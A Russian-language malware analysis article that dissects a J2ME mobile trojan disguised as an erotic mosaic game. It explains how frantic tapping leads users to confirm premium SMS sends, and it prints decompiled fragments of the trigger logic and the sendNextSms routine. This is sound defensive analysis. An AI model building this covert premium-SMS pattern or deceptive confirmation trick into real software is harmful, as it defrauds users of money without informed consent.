Во всех предыдущих статьях из этой рубрики совсем не упоминались мобильные зловреды. Однако они существуют и, вопреки расхожему мнению, наносят неплохой урон кошельку пользователей. Поэтому в этой статье я разберу троянца для мобильных телефонов, маскирующегося под игру эротического содержания.

Итак, подопытный – зловред под Java 2 Micro Edition (J2ME). Напомню читателям, что именно эту платформу для запуска приложений использует подавляющее большинство обычных мобильных телефонов (это те, которые НЕ смартфоны :)). Ее популярность более чем высока. Прежде чем начать разбор непосредственно файлов, я решил запустить зловред под эмулятором Sjboy. Вот как будет выглядеть экран реального мобильного телефона сразу после запуска сэмпла.

Как мы видим – это приложение позиционирует себя как игра. При этом пользователю любезно сообщается о факте содержания эротического контента. Конечно же, все это сделано исключительно для отвлечения внимания. А теперь – прочитаем правила игры (выдержка, орфография оригинала сохранена):

«Это уникальная эротическая игра на ваш мобильный, которая не имеет аналогов. Цель игры – нужно чем быстрей, тем лучше раcкрыть мозаику из цветных квадратов, для того что бы увидеть спрятанную за ней картинку эротического содержания. Для уничтожения квадратов на экране Вам необходимо нажимать кнопку «Жми»».

Вроде бы, ничего особенного – игра как игра. Но подождите, что там еще написано (выдержка, орфография опять-таки сохранены):

«Дaннaя пpoгpaммa изнaчaльнo coздaнa для peгиcтpaции, кoтopaя oткpывaют вaм дocтyп к плaтнoмy зaкpытoмy apxивy эpoтичecкиx зaгpyзoк, кoтopыe дocтyпны лицaм c 18 и лeт и бoлee. Caмy пpoгpaммy Bы кaчaeтe бecплaтнo, oплaтa пpoиcxoдит тoлькo зa тpaфик пo тapифy вaшeгo oпepaтopa, a зa oтпpaвлeннoe cooбщeниe плaтитe, Bнимaниe cтoимocть cмc cooбщeний oтпpaвкy кoтopыx зaпpocит пpилoжeниe cocтoвляeт: нa нoмepа 5370 ~10.31$ (15 дней), 5373 ~4.57$ (7 дней), 7250 ~3.64$ (3 дня) т.e тeкcт: «cкaчaть бecплaтнo» нa caйтe кacaeтcя тoлькo зaкaчки пpилoжeния, a зa cooбщeния кoтopoe oтcылaeт пpилoжeниe, вы плaтитe. Пpилoжeниe зaпpocит oтпpaвкy sms!!! Чтoбы зapeгиcтpиpoвaтьcя в зaкpытoм эpoтичecкoм apxивe, Bы нaжимaeтe «Дa». Дocтaтoчнo нaжaть oдин paз, нaжмeтe 2 paзa cнимyт co cчeтa, кaк зa 2 sms, и ecли нaжмeтe 3 paзa, тo cyммy cнимyт 3 paзa cooтвecтвeннo. В случае если Вы отправите 3 смс подряд, то Вы получаете дополнительную неделю доступа бесплатно! … »

Так что же получается? Это не игра, а программа для получения доступа к платному контенту?! Кажется, что бояться вроде бы нечего, так как ОС обязательно спрашивает у пользователя, согласен ли он отправить СМС. Но здесь злоумышленники немного схитрили.

Суть игры заключается в том, что нужно очень быстро кликать на кнопку «жми», чтобы успеть открыть картинку. В определенный момент игры появляется подтверждение об отправке СМС, но увлеченный игрок так рьяно жмет на кнопку «жми», что попутно нажимает и кнопку «согласен». Сразу после этого с его счета незамедлительно списывается энное количество денег.

Как это работает?

А теперь – о том, как это работает изнутри. Программы под эту платформу выполнены в виде JAR–файлов. Последние представляют собой обычный ZIP–архив, который можно распаковать. После распаковки мы увидим «файлы», которые используются приложением. Исполнение J2ME-программы начинается с запуска «midlet.class».

Файлы «.class» – это скомпилированный код Java. Можно провести аналогию с файлами, содержащими код на C/C++: «.c”/”.cpp» компилируются в «.obj». Java class’ы можно декомпилировать, например, при помощи JAD. Так я и поступил. Да, у этого зловреда, помимо «midlet.class», присутствовали еще и другие class’ы, с которыми я поступил аналогично.

Первое, что бросилось в глаза – функция sendNextSms. Название, безусловно, говорящее. До этого я говорил, что СМС отправляется не сразу, а в определенные моменты игры. Я решил выяснить, как же это реализовано. Сама функция вызывается в midlet.class следующим образом:

if (e_boolean_fl d)
{
e_boolean_fl d = false;
sendNextSms();
}

Из кода видно, что отправка вызывается только в случае, когда булевая переменная «e_boolean_fld» принимает значение «true». Это происходит только в одном месте в коде:

if(i == b.b && mode > 4 && mode < 6)
{
e.a(e.f, e.g);
if(b.e > 1)
{
while(b.a_int_array2d_static_fl d[rX][rY] == 0)
{
nextX();
nextY();
}
b.a_int_array2d_static_fl d[rX][rY] = 0;
b.e--;
c_int_fl d = 100 — b.f * b.e;
if(c_int_fl d > d_int_fl d)
{
e_boolean_fl d = true;
d_int_fl d = d_int_fl d + 11;
}
nextY();
return;
} else {
a_b_fl d.a(d.a, null);
a_b_fl d.b("Поздравляем!");
a_b_fl d.a(e_java_lang_String_fl d);
e.a(e.g, 0);
a_b_fl d.serviceRepaints();
a_long_fl d = System.currentTimeMillis();
mode = 6;
c_boolean_fl d = true;
return;
}
}

Поскольку исходный код у меня, увы, отсутствует, то о назначении всех переменных приходится догадываться из контекста. Этот фрагмент кода отвечает за обработку пользовательского нажатия по кнопке «жми». Судя по всему, «b.e» – это количество оставшихся квадратов в игре. Если их не осталось, то будет рисоваться поздравление: «a_b_fld.b(«Поздравляем!»);». А если они еще остались, то количество квадратов уменьшится на единицу: b.e—;, и будет произведено дальнейшее рисование «бегающего» элемента. Как видно из кода, булева «e_boolean_fld», которая разрешит отправку SMS, будет выставляться только при определенном условии:

c_int_fld > d_int_fld.

Это условие будет выполняться ближе к концу, когда «b.e» станет очень маленьким, а «c_int_fld», соответственно, большим: c_int_fl d = 100 — b.f * b.e.

Теперь обратимся непосредственно к коду функции sendNextSMS (фрагмент):

String s1 = b_java_lang_String_fl d;
String s = c_java_lang_String_fl d;
c c1 = a_c_fl d;
System.gc();
if(c1.a_java_lang_Thread_fl d == null)
{
c1.a_boolean_fl d = false;
c1.a_java_lang_String_fl d = s1;
c1.b = "sms://" + s;
c1.a_java_lang_Thread_fl d = new Thread(c1);
c1.a_java_lang_Thread_fl d.start();
}
try
{
Thread.sleep(300L);
}
catch(Exception _ex) { }

Здесь происходит заполнение полей объекта «c1». Можно понять, что в строке «s» содержится номер, куда следует отправить SMS, а в строке «s1» содержится текст отправки. После того, как поля объекта становятся заполненными, создается новый поток, которому в качестве параметра передается «c1». Обратимся к этому классу:

MessageConnection messageconnection;
System.gc();
messageconnection = null;
TextMessage textmessage;
(textmessage = (TextMessage)
(messageconnection = (MessageConnection)Connector.open(b)).
newMessage("text")).setAddress(b);
textmessage.setPayloadText(a_java_lang_String_fl d);
messageconnection.send(textmessage);

Я специально вырезал только тот код, который отвечает за отправку сообщения, чтобы не загромождать статью. Мои предположения оказались верными. Так, текст сообщения содержится в строке «a_java_lang_String_fld»: textmessage.setPayloadText(a_java_ lang_String_fl d);. А номер, куда произведена отправка в переменной «b»:

(textmessage = (TextMessage)(messageconnection = (MessageConnection)Connector.open(b)).newMessage("text")).setAddress(b);.

Сама же отправка реализуется посредством следующего вызова: messageconnection.send(textmessage);.

Заключение

Вот и все – мы описали весь «полезный» функционал этой игрытрояна. Оказалось, что любители сомнительного контента могут легко попасться на элементарные уловки злоумышленников. Стоит отметить, что сам троянец выполнен достаточно качественно: по-видимому, на его разработку ушло не так мало времени. Но, что радует, – его разбор оказался совсем несложным.

Теги:

Оставить мнение

Check Also

WTF is APT? Продвинутые атаки, хитрости и методы защиты

Наверняка ты уже читал о масштабных сетевых атаках, от которых пострадали банки, крупные п…